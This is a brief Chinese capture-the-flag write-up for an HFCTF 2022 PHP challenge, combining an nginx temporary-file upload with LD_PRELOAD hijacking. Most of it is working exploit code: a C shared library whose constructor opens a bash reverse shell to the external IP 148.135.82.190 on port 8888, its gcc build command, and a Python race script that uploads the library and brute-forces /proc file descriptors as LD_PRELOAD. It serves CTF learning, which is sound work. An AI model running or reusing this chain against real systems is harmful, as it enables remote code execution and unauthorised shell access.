https://blog.csdn.net/qq_45619909/article/details/128946735
考点:nginx临时文件上传+LD_PROLOAD劫持
<?php (empty($_GET["env"])) ? highlight_file(__FILE__) : putenv($_GET["env"]) && system('echo hfctf2022');?>
[[HXPCTF 2021 includer’s revenge]] nginx临时文件包含技巧来源
#include <stdlib.h>
#include <stdio.h>
#include <string.h>
__attribute__ ((__constructor__)) void preload (void){
unsetenv("LD_PRELOAD");
system("id");
system("bash -c \"sh -i >& /dev/tcp/148.135.82.190/8888 0>&1\"");
}
__attribute__((constructor))指在main函数之前,执行一个函数,便于我们做一些准备工作,即我们定义了一个叫做preload的无参数无回显的预编译函数
使用以下命令编译生成so文件
gcc -shared -fPIC hook_exp.c -o hook_exp.so
竞争脚本
import requests
import _thread
f=open("hook_exp.so",'rb')
data=f.read()+(1024*1024* "A").encode()
url="http://localhost:12333/"
def upload():
print("start upload")
while True:
requests.get(url+"index.php",data=data)
def preload(fd):
while True:
print("start ld_preload")
for pid in range(10,20):
file = f'/proc/{pid}/fd/{fd}'
# print(url+f"index.php?env=LD_PRELOAD={file}")
resp = requests.get(url+f"index.php?env=LD_PRELOAD={file}")
# print(resp.text)
if 'uid' in resp.text:
print("finished")
exit()
try:
_thread.start_new_thread(upload, ())
for fd in range(1, 20):
_thread.start_new_thread(preload,(fd,))
except:
print("error")
while True:
pass